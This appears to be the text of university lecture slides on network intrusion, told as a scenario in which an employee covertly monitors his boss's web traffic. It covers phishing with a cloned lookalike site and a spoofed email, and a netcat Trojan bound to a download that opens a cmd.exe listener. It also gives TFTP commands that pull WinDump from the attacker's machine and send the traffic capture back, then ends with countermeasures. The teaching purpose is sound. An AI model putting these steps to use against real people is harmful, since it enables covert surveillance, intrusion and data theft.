TEL 283 - Long Island University
Download
Report
Transcript TEL 283 - Long Island University
What’s the Boss viewing?
The Boss established a new policy against
surfing the web during work hours
Phoenix decides to examine the sites that the
Boss is looking at by spying on him
The networked machines are connected via a
switch
◦ Private 192.168.1.0 network
Boss’ IP:
192.168.1.5
Phoenix’s IP: 192.168.1.6
Monitor traffic to and from the Boss’ machine
How “loud” should this approach be?
◦ Loud/noisy means that could trigger alarms of
IDS/IPS systems
Might be reasons to launch a noisy attack
Provide a distraction to another attack
Sometimes it’s the only way to monitor traffic
Since a single host’s traffic is the target, ARP
poisoning, MAC spoofing or MAC flooding
will not be done
“Loud” methods
◦ Gratuitous ARP for individual hosts
ARP Poisoning
◦ MAC spoofing
◦ MAC flooding
◦ SPAN
Port mirroring
Gratuitous ARP
◦ Unsolicited ARP
Protocol allows for it, without checking for the ARP request
(stateless!)
ARP reply sent out associating the target’s IP with the
collector’s MAC address
Spoof the MAC of the gateway
MAC flooding
◦ Collector replies to ARP requests for the gateway’s MAC
◦ Switch will see the router’s MAC address on both switch
ports will send outbound traffic to both ports
◦ Overwhelm the switch’s MAC table
Causes the switch to “failover” into hub mode
MACOF (http://monkey.org/~dugsong/dsniff/)
Capture the traffic on the target host itself
◦ Plant WinPCap and Trojan Horse on the host
The trick will be to install the software on the
target host
◦ Boss will not blindly install software
Have to convince him it’s something of value to him
The plan consists of a chained series of
exploits
Copy a web site and host it on Phoenix’s server
Bind Netcat to a legitimate executable file
Send email to boss
◦ Download the free executable
Netcat will also be downloaded and installed
Connect to boss’ machine using Netcat
Use TFTP and download a WinDump program
onto boss’ machine
Capture the boss’ network traffic
Analyze captured traffic
Rebuild a jpg image using a hex editor
Phoenix locates a site and plans to get his
boss to visit a copied version of the site
◦ Lays the groundwork via some social engineering
Tells boss of a site “certificatepractice.com” which
offers free CCNA practice exam as a promotional offer
◦ Uses a utility to download and mirror the site
Wget (www.gnu.org/software/wget)
Copy the site recursively to hard drive, with
appropriate level of hyperlinks of the 1st page
Will also copy the practice test executable
Phoenix will bind his Trojan to this executable
Trojan wrapper program is used
◦ YAB (Yet Another Binder)
Areyoufearless.com (no longer there, however can get via
BitTorrent sites)
Altavista.net
Packetstormsecurity.org
Add Bind File option
Allows Phoenix to bind nc.exe
Will execute nc (asynchronously is possible)
Can add execution parameters when nc starts up
Np 50 –e cmd.exe –L
Registry startup option available (default is no)
Melt stub option
Will remove netcat after execution
Icon can be added to make the install appear legitimate
Overwrite the original ccna.exe file with the
bound Trojan file in the phony site
Register a very similar domain name
◦ “certification-practice.com”
Send an email to victim
◦ Phoenix uses an anonymous e-mailer and spoofs
the email header to have the “From:” appear as the
real site
www.mail.com
Doesn’t require a “real” email address to register
Victim would have to read the email message headers
in order to see the real source domain
Check for spelling and grammatical errors
Offer something free or trial basis
Appeal to greed
◦ Why victim is getting something for nothing
Lower suspicion
Appeal to victim’s sense of self
◦ Self-help tools, adding to success, etc
Brevity
Text of the email contains the link to the site
Present the email to the victim
◦ Appears as the URL of the real site, but the hyperlink is
really the phony site
◦ Possibly prepare the victim for the email, adding to the
enticement
Angry IP Scanner
◦ www.angryziber.com/ipscan/
Scan IP’s on the network for the IP with port
50 open and listening
nc to the victim’s machine on port 50
Verify the connection using ipconfig
◦ Will show the victim machine’s IP in the nc window
Use command line utility
Sysinternals has a TFTP server available
Windump is downloaded
◦ nc does not allow for usage of a GUI (Windows) interface
◦ Free
◦ No configuration required
◦ Windows already has a TFTP client!
◦ www.winpcap.org/windump
◦ Placed into the default TFTP server directory (TFPT-Root)
Phoenix sets up a TFTP server on his machine
Using Netcat, Phoenix types
tftp –i 192.168.1.6 get windump.exe windump.exe
tftp [-i] host [put | get] source destination
-i switch
use binary transfer
Options
◦ -c
◦ -s
◦ -w
count (packets)
snaplength (length of packets captured)
filename (of captured packets)
windump –c 500 –s 1500 –w capture.log
If the victim does not have winpcap installed,
Phoenix must transfer and manually install
winpcap on victim machine
◦ Windump requires winpcap
Phoenix downloads winpcap
Unzips it
TFTP (to victim’s winpcap directory)
◦
◦
◦
◦
◦
Daemon_mgm.exe
NetMonInstaller.exe
Npf_mgm.exe
Rpcapd.exe
Uninstall exe
Execute
Npf_mgm.exe –r
Daemon_mgm.exe –r
NetMonInstaller.exe i
Using Netcat
Use a packet analyzer to view the traffic
A review show sites visited by the victim
Follow TCP stream
tftp –I put 192.168.1.6 capture.log
◦ Wireshark
◦ Includes a GET (HTTP) for a file called “gambling.jpg”
◦ Capture the output as raw data
◦ Use a hex editor (WinHex), if required, to edit the raw
data
Remove everything before the actual binary file (HTTP
commands, etc)
Leaves just the actual binary of the image
Jpg starts with ÿØÿà
Anonymous note left on the victim’s desk
highlighting the activity
Internet usage policy relaxed the next day
Phishing
Trojan horse
◦ Training!
◦ Spam filters / phishing filters
◦ Anti-virus software
Latest signatures
◦ However
Organizations will alter the Trojan (for a price) so that it does not match a
signature
EliteC0ders (no longer offers this “service”)
◦ Software policy
◦ Sniffing
Port security on switches
Protects against ARP poisoning, MAC spoofing and MAC flooding
Cisco Secure Agent
Warns if new application is launching
IPS
PromiScan
Host based IDS